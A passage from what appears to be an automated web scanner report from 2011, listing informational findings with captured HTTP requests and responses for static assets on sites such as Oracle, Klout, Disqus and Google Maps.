Cookie: zdccn=04bb52f0-790c-4a32-8ddb-c2706be7de34; JSESSIONID=D5909C35AB518D9214040EC162CA2063

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:01:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 30327


var i18n = new Array();
i18n['zohodiscussions.general.loading']="Loading";
i18n['zohodiscussions.general.myarea']="My Area";
i18n['zohodiscussions.general.allForums']="All Forums";
i18n['zohodisc
...[SNIP]...

17.14. http://duckduckgo.com/iyp/6172532871  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://duckduckgo.com
Path:   /iyp/6172532871

Request

GET /iyp/6172532871 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=3+ames+st.,+02142
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 03:16:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
X-Node: web28, api_com
Vary: User-Agent,Accept-Encoding
X-Proxied: lb1
Content-Length: 74

nryp({"message":{"text":"OK","code":0,"version":"1.1.1"},"businesses":[]})

17.15. http://eventreg.oracle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://eventreg.oracle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: eventreg.oracle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:17:43 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15

No favicon.ico"

17.16. http://eventreg.oracle.com/webapps/events/ns/css/ers.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://eventreg.oracle.com
Path:   /webapps/events/ns/css/ers.css

Request

GET /webapps/events/ns/css/ers.css HTTP/1.1
Host: eventreg.oracle.com
Proxy-Connection: keep-alive
Referer: http://eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp?p_eventId=117156&src=6804803&src=6804803&Act=40
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=438058f0ed486085d4140952cd54e048a878cc48287bab5277a722608c6b2d81.e3yTa3qSb38Te3mRbN0Lc3aQbO0

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Last-Modified: Sat, 05 Feb 2011 10:26:39 GMT
Accept-Ranges: bytes
Content-Length: 5627
Connection: close
Content-Type: text/css
X-Pad: avoid browser bug

<STYLE TYPE="text/css">
//
.HrLine{size:20px; color: #0033FF; width :100%;}
.leftnavlink { font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 14px; COLOR: blue; font-weight: b
...[SNIP]...

17.17. http://ilove.klout.com/lkck.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ilove.klout.com
Path:   /lkck.js

Request

GET /lkck.js HTTP/1.1
Host: ilove.klout.com
Proxy-Connection: keep-alive
Referer: http://klout.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103eae209d9a08b4a373a6ad539ce16e4df1429504f76b570cf2aabd32c14984f3f7e12072f8ade69a7b5ff2200689db1b7; __utmz=261428178.1298945311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.1003945043.1298945311.1298945311.1298945311.1; __utmc=261428178; __utmb=261428178.1.10.1298945311; __qca=P0-1165085945-1298945312517

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 01 Mar 2011 02:08:01 GMT
Content-Type: application/x-javascript
Content-Length: 83
Last-Modified: Wed, 16 Feb 2011 07:38:50 GMT
Connection: close
Expires: Tue, 01 Mar 2011 02:08:01 GMT
Cache-Control: max-age=0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Accept-Ranges: bytes

lkd("lkck.js loaded.");
lkTrk(lkTrkURL(_lktrk));
evadd(window, "click", lkTryClk);

17.18. http://img.tweetimag.es/i/secsci_n  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.tweetimag.es
Path:   /i/secsci_n

Request

GET /i/secsci_n HTTP/1.1
Host: img.tweetimag.es
Proxy-Connection: keep-alive
Referer: http://qwerly.com/search?utf8=%E2%9C%93&query=xss
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Date: Tue, 01 Mar 2011 02:48:45 GMT
Expires: Wed, 02 Mar 2011 02:48:45 GMT
Server: nginx/0.6.39
X-Powered-By: PHP/5.2.9
X-Twitter-Origin: http://a1.twimg.com/profile_images/187133575/web2owned_normal.gif
Content-Length: 2533

.PNG
.
...IHDR...0...0.....W.......bKGD.............    oFFs...v......QX....    pHYs...H...H.F.k>...    vpAg.......0...B...    [IDATh..YkpU.......{...7....4...$......yED.".Z."V..G.N.u...C.1U....X.-..P..*....H.
...[SNIP]...

17.19. http://klout.com/public/images/partners.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://klout.com
Path:   /public/images/partners.gif

Request

GET /public/images/partners.gif HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
Referer: http://klout.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103eae209d9a08b4a373a6ad539ce16e4df1429504f76b570cf2aabd32c14984f3f7e12072f8ade69a7b5ff2200689db1b7

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:07:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 07 Jan 2011 02:36:17 GMT
Accept-Ranges: bytes
Content-Length: 27895
Content-Type: image/gif

.PNG
.
...IHDR...<...z....."s......tEXtSoftware.Adobe ImageReadyq.e<..l.IDATx..].x.E..7$.$.. .z.....JS...Q..~...;.. . Ho....;    -.PB..P.$..9...'.... ..y.}..-...3g.[.....r..Nv.?.....t_\\..yyy9....c..
...[SNIP]...

17.20. http://landingpad.oracle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://landingpad.oracle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: landingpad.oracle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762293763; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:18:03 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15

No favicon.ico"

17.21. http://lilypad-cdn.cranberry.com/img/fav/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/fav/

Request

GET /img/fav/?type=43things&url=aHR0cDovL3d3dy40M3RoaW5ncy5jb20vcGVyc29uL2RhdmlkbWNpbm5pcw== HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.cranberryventurepartners.com/about-us.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=2946060ac3d26870585203f2a5fc7114

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:45:01 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 929
Connection: close
Content-Type: image/png

GIF89a.................................{..k..Z..J..B..1..!..............................................................................................................................................
...[SNIP]...

17.22. http://liveintent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://liveintent.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: liveintent.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261340944.1298985416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261340944.1401405927.1298985416.1298985416.1298985416.1; __utmc=261340944; __utmb=261340944.1.10.1298985416

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 12:43:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 03 Feb 2011 18:25:21 GMT
ETag: "b303f6-57e-e3662640"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ....................................y...y...y...w...x..@p...y..)\...............x......V...............)\..*]................~......w..+[..-[........c.............(\..)[
...[SNIP]...

17.23. https://login.live.com/pp1000/RDHelper_JS.srf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.live.com
Path:   /pp1000/RDHelper_JS.srf

Request

GET /pp1000/RDHelper_JS.srf?x=10.0.17084.0&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MSPRequ=lt=1298834433&co=1&id=74335; MSPOK=$uuid-6278c8d3-acda-423f-b793-0efb77b580bc; CkTst=G1298834441147

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Feb 2011 19:20:39 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 26 Feb 2016 19:20:39 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1K30 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Vary: Accept-Encoding
Content-Length: 9536


<!-- ServerInfo: BAYIDSLGN1K30 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
var k_fRealmNone=0,k_fRealmAllowWLIDSignIn=1<<0,k_fRealmAllowFedSignIn=1<<1,k_fRealmConflictInactive=1<<2,k_fRealmConfl
...[SNIP]...

17.24. https://login.oracle.com/sso_loginui/oracle.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.oracle.com
Path:   /sso_loginui/oracle.css

Request

GET /sso_loginui/oracle.css HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Tue, 22 Apr 2008 09:59:40 GMT
ETag: "97d17-2eb0-480db70c"
Accept-Ranges: bytes
Content-Length: 11952
Connection: close
Content-Type: text/css
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

<STYLE TYPE="text/css">


/* TEXT STYLES */
.betastuff { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; text-decoration: none }

.bodylink {font-family: Arial, H
...[SNIP]...

17.25. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fplancast.com%2Fp%2F3zbp&callback=_xdc_._egtm84&token=58246 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://plancast.com/p/3zbp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 01 Mar 2011 14:12:30 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._egtm84 && _xdc_._egtm84( [1] )

17.26. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d30.13281806495917&2d-98.12672417749025&2m2&1d30.401467515304425&2d-97.35939782250978&2u12&4sen-US&5e0&callback=_xdc_._o5io5e&token=21953 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://plancast.com/p/3zbp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 01 Mar 2011 14:12:29 GMT
Server: mafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3499

_xdc_._o5io5e && _xdc_._o5io5e( ["Map data ..2011 Google",[["obliques",[[30.37287518811803,-97.6904296875],[30.41078179084588,-97.646484375]]],["obliques",[[30.33495388198856,-97.822265625],[30.372875
...[SNIP]...

17.27. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/closedhand_8_8.cur

Request

GET /intl/en_us/mapfiles/closedhand_8_8.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.gstatic.com

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Mon, 28 Feb 2011 17:01:43 GMT
Expires: Mon, 28 Feb 2011 17:01:43 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@........................................................................................................................................................................
...[SNIP]...

17.28. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Request

GET /intl/en_us/mapfiles/openhand_8_8.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.gstatic.com

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Mon, 28 Feb 2011 17:01:29 GMT
Expires: Mon, 28 Feb 2011 17:01:29 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@...............................................................................................................................?...w...g...............................
...[SNIP]...

17.29. http://mediacdn.disqus.com/1298421702/fonts/disqus-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mediacdn.disqus.com
Path:   /1298421702/fonts/disqus-webfont.woff

Request

GET /1298421702/fonts/disqus-webfont.woff HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-930191663-1298773827745

Response

HTTP/1.0 200 OK
Date: Sun, 27 Feb 2011 02:32:05 GMT
Expires: Tue, 29 Mar 2011 02:32:05 GMT
Last-Modified: Fri, 25 Feb 2011 20:16:59 GMT
Accept-Ranges: bytes
Content-Length: 5304
Access-Control-Allow-Origin: *
Content-Type: text/plain
Server: Apache/2.2.14 (Ubuntu)
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Cache: HIT from chafe.disqus.net
X-Cache-Lookup: HIT from chafe.disqus.net:3128
X-Origin-Date: Sat, 26 Feb 2011 07:20:01 GMT
X-Origin-Expires: Mon, 28 Mar 2011 07:20:01 GMT
X-Cache-Age: 42195
X-Cache: HIT from cdce-nym011-010.nym011.internap.com
X-Origin-Date: Sat, 26 Feb 2011 19:03:16 GMT
X-Origin-Expires: Mon, 28 Mar 2011 19:03:16 GMT
X-Cache-Age: 26929
X-Cache: HIT from cdce-nym011-011.nym011.internap.com
Via: 1.1 chafe.disqus.net:3128 (squid), 1.0 cdce-nym011-010.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-011.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive

wOFF...............`........................FFTM...l........Z.V.GDEF........... .Y..OS/2.......E...`t.f.cmap................cvt .......6...6 ...fpgm...........e../.gasp................glyf...........p
...[SNIP]...

17.30. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/logo-oracle-red.png

Request

GET /EndUser/images/logo-oracle-red.png HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:23:29 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=3600+360;age=159;ecid=167047631870118073,0)
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M    ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

17.31. https://myprofile.oracle.com/EndUser/jscripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Request

GET /EndUser/jscripts/s_code.js HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
